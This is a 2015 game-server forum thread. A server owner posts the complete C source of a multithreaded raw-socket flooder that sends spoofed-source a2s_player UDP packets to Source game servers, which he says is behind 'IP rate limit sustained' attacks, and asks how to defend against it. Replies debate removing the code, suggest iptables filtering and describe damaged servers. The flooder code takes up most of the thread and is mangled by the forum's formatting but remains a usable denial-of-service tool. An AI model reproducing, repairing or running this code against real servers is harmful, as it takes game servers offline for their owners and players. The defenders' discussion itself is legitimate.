Raised This Month: $ Target: $400
 0% 

How to fight "a2s_player spam" script? (IP rate limit sustained)


Post New Thread Reply   
 
Thread Tools Display Modes
Author Message
n3tman
New Member
Join Date: Dec 2015
Old 12-13-2015 , 13:20   How to fight "a2s_player spam" script? (IP rate limit sustained)
Reply With Quote #1

There has been many reports from server owners experiencing "IP rate limit sustained" attacks.

Notice that they started appearing in September 2015.

I think I've found the exact script that is used by the attackers and the place where they get it from.

It was posted on "Hack Forums" on the 6th of September. It's a free registration forum, so any kid can make an account there, find this script and use it to abuse servers.

[C] Source Player Query Spam (a2s_player spam)

PHP Code:
#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
 
 
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
char sourceip[17];
 
static 
uint32_t Q[4096], 362436;
 
 
struct thread_data{
        
int throttle;
        
int thread_id;
        
unsigned int floodport;
        
struct sockaddr_in sin;
};
 
 
void init_rand(uint32_t x)
{
        
int i;
        
Q[0] = x;
        
Q[1] = PHI;
        
Q[2] = PHI PHI;
 
        for (
34096i++)
                
Q[i] = Q[3] ^ Q[2] ^ PHI i;
}
 
 
uint32_t rand_cmwc(void)
{
        
uint64_t t18782LL;
        static 
uint32_t i 4095;
        
uint32_t x0xfffffffe;
        
= (1) & 4095;
        
Q[i] + c;
        
= (>> 32);
        
c;
        if (
c) {
                
x++;
                
c++;
        }
        return (
Q[i] = x);
}
 
 
char *myStrCat (char *schar *a) {
    while (*
!= '\0's++;
    while (*
!= '\0') *s++ = *a++;
    *
'\0';
    return 
s;
}
 
 
char *replStr (char *strsize_t count) {
    if (
count == 0) return NULL;
    
char *ret malloc (strlen (str) * count count);
    if (
ret == NULL) return NULL;
    *
ret '\0';
    
char *tmp myStrCat (retstr);
    while (--
count 0) {
        
tmp myStrCat (tmpstr);
    }
    return 
ret;
}
 
/* Create header checksum*/
unsigned short csum (unsigned short *bufint nwords)
{
  
unsigned long sum;
  for (
sum 0nwords 0nwords--)
  
sum += *buf++;
  
sum = (sum >> 16) + (sum 0xffff);
  
sum += (sum >> 16);
  return (
unsigned short)(~sum);
}
void setup_ip_header(struct iphdr *iph)
{
  
iph->ihl 5;
  
iph->version 4;
  
iph->tos 0;
iph->tot_len sizeof(struct iphdr) + sizeof(struct udphdr) + 9;
  
iph->id htonl(54321);
  
iph->frag_off 0;
  
iph->ttl MAXTTL;
  
iph->protocol IPPROTO_UDP;
  
iph->check 0;  
   
/* Base Address to start */
      
snprintf(sourceipsizeof(sourceip)-1"%d.%d.%d.%d"rand()%255rand()%255rand()%255rand()%255);
      
iph->saddr inet_addr(sourceip); // Holy fuck this is terrible
}
 
 
void setup_udp_header(struct udphdr *udph)
{
  
udph->source htons(27005);
  
udph->check 0;
  
char *data = (char *)udph sizeof(struct udphdr);
      
memcpy((void *)udph sizeof(struct udphdr), "\xFF\xFF\xFF\xFF\x55\x4B\xA1\xD5\x22"9);
      
udph->len=htons(sizeof(struct udphdr) + 9);
}
 
 
void *flood(void *par1)
{
  
struct thread_data *td = (struct thread_data *)par1;
  
fprintf(stdout"Thread %d started\n"td->thread_id);
  
char datagram[MAX_PACKET_SIZE];
  
struct iphdr *iph = (struct iphdr *)datagram;
  
struct udphdr *udph = (/*u_int8_t*/void *)iph sizeof(struct iphdr);
  
struct sockaddr_in sin td->sin;
  
char new_ip[sizeof "255.255.255.255"];
 
  
int s socket(PF_INETSOCK_RAWIPPROTO_TCP);
  if(
0){
    
fprintf(stderr"Could not open raw socket.\n");
    exit(-
1);
  }
  
unsigned int floodport td->floodport;
  
/* Reset data */
  
memset(datagram0MAX_PACKET_SIZE);
  
/* Set appropriate fields in headers */
  
setup_ip_header(iph);
  
setup_udp_header(udph);
  
udph->dest htons(floodport);
  
iph->daddr sin.sin_addr.s_addr;
  
iph->check csum ((unsigned short *) datagramiph->tot_len >> 1);
  
int tmp 1;
  const 
int *val = &tmp;
  if(
setsockopt(sIPPROTO_IPIP_HDRINCLvalsizeof (tmp)) < 0){
    
fprintf(stderr"Error: setsockopt() - Cannot set HDRINCL!\n");
    exit(-
1);
  }
  
int throttle td->throttle;
  
uint32_t random_num;
  
uint32_t ul_dst;
  
init_rand(time(NULL));
  if(
throttle == 0){
    while(
1){
      
sendto(sdatagramiph->tot_len0, (struct sockaddr *) &sinsizeof(sin));
      
random_num rand_cmwc();
 
      
ul_dst = (random_num >> 24 0xFF) << 24 |
               (
random_num >> 16 0xFF) << 16 |
               (
random_num >> 0xFF) << |
               (
random_num 0xFF);
      
iph->saddr ul_dst;
      
udph->source htons(random_num 0xFFFF);
      
iph->check csum ((unsigned short *) datagramiph->tot_len >> 1);
    }
  } else {
    while(
1){
      
throttle td->throttle;
      
sendto(sdatagramiph->tot_len0, (struct sockaddr *) &sinsizeof(sin));
      
random_num rand_cmwc();
      
ul_dst = (random_num >> 24 0xFF) << 24 |
               (
random_num >> 16 0xFF) << 16 |
               (
random_num >> 0xFF) << |
               (
random_num 0xFF);
      
iph->saddr ul_dst;
      
udph->source htons(random_num 0xFFFF);
      
iph->check csum ((unsigned short *) datagramiph->tot_len >> 1);
     while(--
throttle);
    }
  }
}
 
 
int main(int argcchar *argv[ ])
{
  if(
argc 5){
    
fprintf(stderr"Invalid parameters!\n");
    
fprintf(stdout"a2s_player (UDP Spoof Attack) \nUsage: %s <target IP/hostname> <port to be flooded> <throttle (lower is faster)> <number threads to use> <time (optional)>\n"argv[0]);
    exit(-
1);
  }
  
fprintf(stdout"Setting up Sockets...\n");
  
int num_threads atoi(argv[4]);
  
unsigned int floodport atoi(argv[2]);
  
pthread_t thread[num_threads];
  
struct sockaddr_in sin;
  
sin.sin_family AF_INET;
  
sin.sin_port htons(floodport);
  
sin.sin_addr.s_addr inet_addr(argv[1]);
  
struct thread_data td[num_threads];
  
int i;
  for(
0;i<num_threads;i++){
    
td[i].thread_id i;
    
td[i].sin sin;
    
td[i].floodport floodport;
    
td[i].throttle atoi(argv[3]);
    
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
  }
  
fprintf(stdout"Starting Flood...\n");
  if(
argc 5)
  {
    
sleep(atoi(argv[5]));
  } else {
    while(
1){
      
sleep(1);
    }
  }
 
  return 
0;

So, now that we know what we are fighting with, how do we protect our servers from it? What are the possible solutions?

We need your help, dear AlliedModders masterminds!

I'm a Linux noob myself, but I will try this and that iptables guides and report here if it helps.

Last edited by n3tman; 12-13-2015 at 13:25.
n3tman is offline
Neuro Toxin
Veteran Member
Join Date: Oct 2013
Location: { closing the void; }
Old 12-13-2015 , 17:43   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)
Reply With Quote #2

Dont post the exploit here.

U should email this directly to valve or pm senior / trusted admins on alliedmods.

Remove the code from your post. Your enabling ppl to use it.
__________________
Neuro Toxin is offline
n3tman
New Member
Join Date: Dec 2015
Old 12-13-2015 , 18:41   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)
Reply With Quote #3

Neuro Toxin, you're right, I will try to write to CS:GO devs now, but I won't remove the code, because I want to draw more attention to it so that it can be fixed faster.

I'll let admins/moderators decide if it should be removed or not. I was hoping posting the code here would allow some cool C++ developers to help find a way to defend from it.

UPD: sent an e-mail to [email protected]. Seems like it's the only way you can report such things, because writing about it on the official CS:GO forums is useless (several scripts are already posted there). And even registration is not working.

Last edited by n3tman; 12-13-2015 at 19:10.
n3tman is offline
Puppetmaster
Senior Member
Join Date: Jun 2015
Location: Probably at a computer.
Old 12-13-2015 , 22:25   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)
Reply With Quote #4

PHP Code:
      snprintf(sourceipsizeof(sourceip)-1"%d.%d.%d.%d"rand()%255rand()%255rand()%255rand()%255);
      
iph->saddr inet_addr(sourceip); // Holy fuck this is terrible 
Looks like its going to be a pain to defend against this. While it has a rotating spoof of their their source address, I find it interesting that it does not call setup_ip_header more than once per thread so it should be possible to block the ips using iptables. Unless they restart the binary that should block them (They WILL restart eventually).

I would start by setting up a good set of iptables with things like Martians removed by default to help slow this kind of attack down (Due to the way this is coded its spoof code allows loopbacks, Martians, etc).

I would expect a better version to be found in the wild shortly. Off the top of my head I can see a few areas that could be easily improved to make this much more dangerous.
__________________

GZS Servers
Puppetmaster is offline
Neuro Toxin
Veteran Member
Join Date: Oct 2013
Location: { closing the void; }
Old 12-13-2015 , 22:15   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)
Reply With Quote #5

Dont leave that code here. More ppl are getting it / using it. Dont make this open to public. Remove the code please.
__________________
Neuro Toxin is offline
asherkin
SourceMod Developer
Join Date: Aug 2009
Location: OnGameFrame()
Old 12-14-2015 , 02:50   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)
Reply With Quote #6

Quote:
Originally Posted by Neuro Toxin View Post
Dont leave that code here. More ppl are getting it / using it. Dont make this open to public. Remove the code please.
Anybody with the capability of using it will already have the means to.

This isn't exactly new either, the same class of DoS attacks have been around since the first Source servers.
__________________

Last edited by asherkin; 12-14-2015 at 02:52.
asherkin is offline
veli
Senior Member
Join Date: Apr 2012
Location: Netherlands
Old 12-14-2015 , 05:16   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)
Reply With Quote #7

My question is how got you that code? So i can say maybe you have used it self too? I had time ago same problem and due this shit my server is dead. But did not knew that this a little shit script was.

Is that a script for attack? I searched many weeks on internet and could not find out what it was. So DDOS protection not helping too. I am waiting more than 1 week on a answer from my host how to fix this.

No answer yet.

I think you have to remove that shit here. There are enough crazy people who can use it.
veli is offline
cTmoNe
AlliedModders Donor
Join Date: Jul 2010
Location: Germany
Old 12-14-2015 , 06:44   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)
Reply With Quote #8

Quote:
Originally Posted by veli View Post
My question is how got you that code? So i can say maybe you have used it self too? I had time ago same problem and due this shit my server is dead. But did not knew that this a little shit script was.

Is that a script for attack? I searched many weeks on internet and could not find out what it was. So DDOS protection not helping too. I am waiting more than 1 week on a answer from my host how to fix this.

No answer yet.

I think you have to remove that shit here. There are enough crazy people who can use it.
Yea same problem to my server.


LE: With qcache_mm the server is still online but the player will see offline.
__________________



Last edited by cTmoNe; 12-14-2015 at 14:37.
cTmoNe is offline
Puppetmaster
Senior Member
Join Date: Jun 2015
Location: Probably at a computer.
Old 12-14-2015 , 17:18   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)
Reply With Quote #9

Quote:
Originally Posted by veli View Post
My question is how got you that code? So i can say maybe you have used it self too? I had time ago same problem and due this shit my server is dead. But did not knew that this a little shit script was.

Is that a script for attack? I searched many weeks on internet and could not find out what it was. So DDOS protection not helping too. I am waiting more than 1 week on a answer from my host how to fix this.

No answer yet.

I think you have to remove that shit here. There are enough crazy people who can use it.
People with the skills to compile this either already have skills or are one step away from making their own from scratch anyway. Its not complicated code, half of the second year students at my university could have made something like this ;)
__________________

GZS Servers
Puppetmaster is offline
medic917
Senior Member
Join Date: Aug 2014
Old 12-13-2015 , 23:32   Re: How to fight "a2s_player spam" script? (IP rate limit sustained)
Reply With Quote #10

I was attacked by a different dos attack.
But thought yours was interesting and decided to help.

Try this: https://forums.alliedmods.net/showpo...1&postcount=35
This apparently helps. Of course I am a complete noob so you can correct me if I'm wrong.
medic917 is offline
Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT -4. The time now is 00:16.


Powered by vBulletin®
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Theme made by Freecode